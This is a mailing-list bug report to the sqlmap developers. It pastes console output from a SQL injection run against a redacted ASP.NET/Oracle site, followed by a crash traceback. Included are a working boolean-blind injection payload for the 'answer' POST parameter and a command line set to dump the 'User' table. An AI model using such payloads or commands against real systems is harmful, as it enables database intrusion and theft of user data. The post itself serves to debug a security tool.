[14:26:08] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: answer
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: answer=Fpxn) AND 3085=3085 AND
(7792=7792&method=1&step=HVWK&prevstep=1&allanswers=JoKh&productpagenr=
---
[14:26:09] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[14:26:09] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) entries
[14:26:09] [INFO] fetching current database
[14:26:09] [WARNING] running in a single-thread mode. Please consider usage
of option '--threads' for faster data retrieval
[14:26:09] [INFO] retrieved:
[14:26:10] [WARNING] reflective value(s) found and filtering out
[14:26:14] [WARNING] in case of continuous data retrieval problems you are
advised to try a switch '--no-cast' or switch '--hex'
[14:26:14] [WARNING] missing database parameter. sqlmap is going to use the
current database to enumerate table(s) columns
[14:26:14] [INFO] fetching current database
[14:26:14] [INFO] retrieved:
[14:26:19] [INFO] fetching columns for table 'USER' in database 'None'
[14:26:19] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5882ab5, retry
your run with the latest development version from the GitHub repository. If
the exception persists, please send by e-mail to '
sqlmap-users@lists.sourceforge.net' or open a new issue at '
https://github.com/sqlmapproject/sqlmap/issues/new' with the following text
and any information required to reproduce the bug. The developers will try
to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-5882ab5
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py -u ************************************************
--dbms=oracle --data
answer=&method=1&step=&prevstep=1&allanswers=&productpagenr= --level=5
--risk=3 --dump -T User --exclude-sysdb --batch --fresh-queries
Technique: BOOLEAN
Back-end DBMS: Oracle (fingerprinted)
Traceback (most recent call last):
File "sqlmap.py", line 95, in main
start()
File "/usr/src/sqlmap-dev/lib/controller/controller.py", line 576, in
start
action()
File "/usr/src/sqlmap-dev/lib/controller/action.py", line 127, in action
conf.dbmsHandler.dumpTable()
File "/usr/src/sqlmap-dev/plugins/generic/entries.py", line 104, in
dumpTable
self.getColumns(onlyColNames=True)
File "/usr/src/sqlmap-dev/plugins/generic/databases.py", line 600, in
getColumns
query = rootQuery.blind.count %
(unsafeSQLIdentificatorNaming(tbl.upper()),
unsafeSQLIdentificatorNaming(conf.db.upper()))
AttributeError: 'NoneType' object has no attribute 'upper'
Kind regards,
Jacco van Tuijl
------------------------------------------------------------------------------
This SF.net email is sponsored by Windows:
Build for Windows Store.
http://p.sf.net/sfu/windows-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
